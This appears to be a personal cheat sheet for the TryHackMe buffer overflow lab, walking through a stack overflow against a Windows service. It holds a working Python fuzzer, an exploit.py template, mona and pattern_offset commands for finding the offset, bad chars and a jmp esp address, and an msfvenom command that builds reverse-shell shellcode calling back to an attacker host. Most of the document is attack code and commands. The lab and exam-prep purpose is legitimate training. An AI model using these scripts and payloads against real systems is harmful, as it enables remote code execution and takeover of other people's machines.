point n shoot
last stop for buffer overflow
ref: TryHackMe BOF path. Connect to the remote Windows box:
How to RDP into windows ?
Exploitation
Step 1: Start Immunity Debugger with admin permissions.
Step 2: Attach to or open the desired application and put it into the running state (the binary opens in a paused state).
How to set working path in Immunity Debugger ?
On Attacker Machine aka Kali
Step 1: Do a port scan and identify the target port.
Step 2: nc ip port and check out the command options; modify the fuzzer script prefix accordingly.
Step 3: Run the fuzzer and wait for it to give you the crashing byte count, then add 400 to that number (for example, the program crashed at 200 bytes, so use 600 below):
python fuzzer.py
Step 4: Create a pattern of that length with the Metasploit pattern_create tool:
/usr/share/metasploit-framework/tools/exploit/pattern_create.rb -l 600
Step 5: Modify exploit.py and put the pattern in the overflow variable; run the script; observe the EIP. Then, in Immunity:
!mona findmsp -distance 600
(600 is the length of the pattern you created.) This outputs the offset. You can double check it with the following, where the value passed to -q is the EIP after the crash with the pattern:
/usr/share/metasploit-framework/tools/exploit/pattern_offset.rb -q 76413176
Step 6: Confirm the offset by setting the offset value in exploit.py, sending that many "A"s followed by the retn / EIP value "BBBB", and observing EIP: if it reads 42424242 the offset is correct.
Step 7: Find bad chars [the fastest n easiest way]. Generate a byte array excluding the null byte (the null byte is always a bad char):
!mona bytearray -b "\x00"
Use the python script to generate the bad chars on the attacking machine as well (check the appendix). Now send the byte array in the payload section of the python exploit, crash the app, and then check for bad chars: after the crash, note the value of ESP [copy this value] and run this command:
!mona compare -f C:\mona\oscp\bytearray.bin -a <address of esp>
For example, with esp = 0188FA30:
!mona compare -f C:\mona\oscp\bytearray.bin -a 0188FA30
Only keep the first char if the bad chars are in a consecutive sequence. Rinse and repeat: update the payload variable, remove the new bad chars from the py exploit, and create a new badchar array using the mona module again:
!mona bytearray -b "\x00\x23\x3c\x83\xba"
Rerun the exploit --> crash the app --> again check the ESP and re-run the following:
!mona compare -f C:\mona\oscp\bytearray.bin -a <address of esp>
For example, with esp = 0193FA30:
!mona compare -f C:\mona\oscp\bytearray.bin -a 0193FA30
Find jmp esp after crashing or before crashing [does not matter]. Mention all your bad chars after the -cpb parameter:
!mona jmp -r esp -cpb "\x00\x23\x3c\x83\xba"
^^^^ here go all your bad chars. Keep the address of jmp esp --> save it in reverse order (little-endian) in the retn / EIP value in exploit.py. Generate your shellcode using msfvenom:
msfvenom -p windows/shell_reverse_tcp LHOST=YOUR_IP LPORT=4444 EXITFUNC=thread -b "\x00morehere" -f c
Paste the output in the payload section, like:
payload = ("adfadfa"
"adadfa"
"afdawfda"
"awdfawdf")
Set nops somewhere between 12-16-20:
nop = "\x90" * 16

Fuzzer python3 script
---x---x---x---x---x---x---x---x---x---x---x---x---x---x---x---x---x---x---x---x---x---x---x---x---x---x---x---x---x---x---x---x---x---x---x---x---x---x---x---x---x---x---
#!/usr/bin/env python3
import socket, time, sys

ip = "MACHINE_IP"
port = 1337
timeout = 5
prefix = "OVERFLOW1 "

# start with 100 bytes of junk after the command prefix
string = prefix + "A" * 100

while True:
    try:
        with socket.socket(socket.AF_INET, socket.SOCK_STREAM) as s:
            s.settimeout(timeout)
            s.connect((ip, port))
            s.recv(1024)  # banner
            print("Fuzzing with {} bytes".format(len(string) - len(prefix)))
            s.send(bytes(string, "latin-1"))
            s.recv(1024)  # response; raises on timeout once the service is dead
    except OSError:
        # connection refused or timed out: the previous send crashed the service
        print("Fuzzing crashed at {} bytes".format(len(string) - len(prefix)))
        sys.exit(0)
    string += 100 * "A"  # grow the junk by 100 bytes per round
    time.sleep(1)
---x---x---x---x---x---x---x---x---x---x---x---x---x---x---x---x---x---x---x---x---x---x---x---x---x---x---x---x---x---x---x---x---x---x---x---x---x---x---x---x---x---x---
Exploit.py
---x---x---x---x---x---x---x---x---x---x---x---x---x---x---x---x---x---x---x---x---x---x---x---x---x---x---x---x---x---x---x---x---x---x---x---x---x---x---x---x---x---x---
#!/usr/bin/env python3
import socket

ip = "MACHINE_IP"
port = 1337

prefix = "OVERFLOW1 "
offset = 0
# this is your junk
overflow = "A" * offset
# this is eip, enter it in reverse
retn = ""
# this is the nop sled
padding = ""
# here goes your shellcode in c format
payload = ""
# remaining bytes from total
postfix = ""

buffer = prefix + overflow + retn + padding + payload + postfix

s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)

try:
    s.connect((ip, port))
    print("Sending evil buffer...")
    s.send(bytes(buffer + "\r\n", "latin-1"))
    print("Done!")
except OSError:
    print("Could not connect.")
---x---x---x---x---x---x---x---x---x---x---x---x---x---x---x---x---x---x---x---x---x---x---x---x---x---x---x---x---x---x---x---x---x---x---x---x---x---x---x---x---x---x---
python badchar create
---x---x---x---x---x---x---x---x---x---x---x---x---x---x---x---x---x---x---x---x---x---x---x---x---x---x---x---x---x---x---x---x---x---x---x---x---x---x---x---x---x---x---
# prints \x01 through \xff on one line; \x00 is skipped as it is always bad
for x in range(1, 256):
    print("\\x" + "{:02x}".format(x), end='')
print()
---x---x---x---x---x---x---x---x---x---x---x---x---x---x---x---x---x---x---x---x---x---x---x---x---x---x---x---x---x---x---x---x---x---x---x---x---x---x---x---x---x---x---
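To make the arithmetic behind Steps 4-7 visible, here is an added example (my own code, not from these notes, TryHackMe, Metasploit or mona) that re-implements the cyclic-pattern offset lookup and the byte-array comparison offline; the function names and the ESP dump are assumptions/constructed, the EIP value and bad-char list are the ones used above.

```python
# Added example (not from the original notes or the TryHackMe room): offline
# re-implementations of the work pattern_offset.rb and "!mona compare" do,
# so the arithmetic is visible. The ESP dump is constructed, not captured.
import string
from itertools import product


def pattern_create(length):
    """Same 'Aa0Aa1Aa2...' cycle as pattern_create.rb, cut to `length` chars."""
    out = ""
    for u, l, d in product(string.ascii_uppercase, string.ascii_lowercase, string.digits):
        if len(out) >= length:
            break
        out += u + l + d
    return out[:length]


def pattern_offset(eip_hex, length=8192):
    """Offset of the 4 pattern bytes that landed in EIP, or None if absent.
    EIP is little-endian: register value 76413176 means 'v1Av' sat in the
    buffer, so the bytes are reversed before searching."""
    needle = bytes.fromhex(eip_hex)[::-1].decode("latin-1")
    idx = pattern_create(length).find(needle)
    return None if idx < 0 else idx


def find_badchars(sent, dumped, known=(0x00,)):
    """Compare the byte array that was sent with the copy found at ESP.
    A mismatch is a bad-char candidate, but the bytes right after a bad char
    are usually mangled too, so only the first byte of each consecutive run of
    mismatches is kept. `known` holds bytes already excluded from `sent`."""
    bad, prev = [], None
    for want, got in zip(sent, dumped):
        if want != got:
            if prev is None or want != prev + 1:
                bad.append(want)
            prev = want
        else:
            prev = None
    return sorted(set(known) | set(bad))


# Constructed sample: the service mangles 0x23 (and the byte after it), 0x3c,
# 0x83 and 0xba, reproducing the list used with "!mona bytearray" above.
SENT = bytes(range(1, 256))
DUMPED = bytearray(SENT)
for val, junk in {0x23: 0x0a, 0x24: 0x0b, 0x3c: 0x00, 0x83: 0x01, 0xba: 0x02}.items():
    DUMPED[val - 1] = junk  # byte value v sits at index v-1 in SENT

if __name__ == "__main__":
    print("offset:", pattern_offset("76413176"))  # 634
    print("badchars:", ["\\x%02x" % b for b in find_badchars(SENT, DUMPED)])
```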